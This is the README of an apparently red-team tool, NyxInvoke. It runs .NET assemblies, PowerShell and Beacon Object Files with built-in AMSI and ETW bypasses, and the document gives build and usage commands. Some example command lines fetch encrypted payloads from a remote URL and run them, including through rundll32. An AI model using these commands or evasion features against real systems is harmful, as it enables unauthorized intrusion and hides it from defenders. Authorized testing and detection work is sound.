NyxInvoke

NyxInvoke is a versatile Rust-based tool designed for executing .NET assemblies, PowerShell commands/scripts, and Beacon Object Files (BOFs) with built-in patchless AMSI and ETW bypass capabilities. It can be compiled as either a standalone executable or a DLL.

Features

• Execute .NET assemblies
• Run PowerShell commands or scripts
• Load and execute Beacon Object Files (BOFs)
• Built-in patchless AMSI (Anti-Malware Scan Interface) bypass
• Built-in patchless ETW (Event Tracing for Windows) bypass
• Support for encrypted payloads with AES decryption
• Flexible input options: local files, URLs, or compiled-in data
• Dual-build support: can be compiled as an executable or a DLL

Building

NyxInvoke can be built as either an executable or a DLL. Use the following commands:

Executable

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

To include compiled-in CLR or BOF data, add the respective features:

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof --bin NyxInvoke

or

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof --lib

Usage

Executable Mode

The executable supports three main modes of operation:

1. CLR Mode (.NET assembly execution)
2. PowerShell Mode
3. BOF Mode (Beacon Object File execution)

General Syntax

NyxInvoke.exe <mode> [OPTIONS]

Where <mode> is one of: clr, ps, or bof.

DLL Mode

When compiled as a DLL, NyxInvoke can be executed using rundll32. The syntax is:

rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Mode-Specific Options

1. CLR Mode:

Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
      --args <ARGS>...            Arguments to pass to the assembly
      --base <URL_OR_PATH>        Base URL or path for resources
      --key <KEY_FILE>            Path to the encryption key file
      --iv <IV_FILE>              Path to the initialization vector (IV) file
      --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"

2. PowerShell Mode:

Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
      --command <COMMAND>  PowerShell command to execute
      --script <SCRIPT>    Path to PowerShell script file to execute
  -h, --help               Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

3. BOF Mode:

Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
      --args <ARGS>...      Arguments to pass to the BOF
      --base <URL_OR_PATH>  Base URL or path for resources
      --key <KEY_FILE>      Path to the encryption key file
      --iv <IV_FILE>        Path to the initialization vector (IV) file
      --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"

Examples

Executable Mode

1. CLR Mode (Remote Execution):

   NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
   

2. PowerShell Mode (Script Execution):

   NyxInvoke.exe ps --script C:\path\to\script.ps1
   

3. BOF Mode (Local Execution):

   NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
   

DLL Mode

1. CLR Mode (Remote Execution):

   rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
   

2. PowerShell Mode (Direct Command Execution):

   rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
   

3. BOF Mode (Compiled Execution):

   rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
   

Test Resources

In the resources directory, you'll find several files to test NyxInvoke's functionality:

1. Encrypted CLR Assembly (Seatbelt):

   • File: clr_data.enc
   • Description: An encrypted version of the Seatbelt tool, a C# project for gathering system information.
   • Usage example:

     NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
     

2. Encrypted BOF (Directory Listing):

   • File: bof_data.enc
   • Description: An encrypted Beacon Object File that List user permissions for the specified file, wildcards supported.
   • Usage example:

     NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
     

Screenshot

• Dll Compiled CLR Executaion

• EXE Remote BOF Executaion

• Dll Powershell Script Executaion

Legal Notice

This tool is for educational and authorized testing purposes only. Ensure you have proper permissions before use in any environment.

Credits

• @yamakadi for the clroxide project
• @hakaioffsec for the coffee project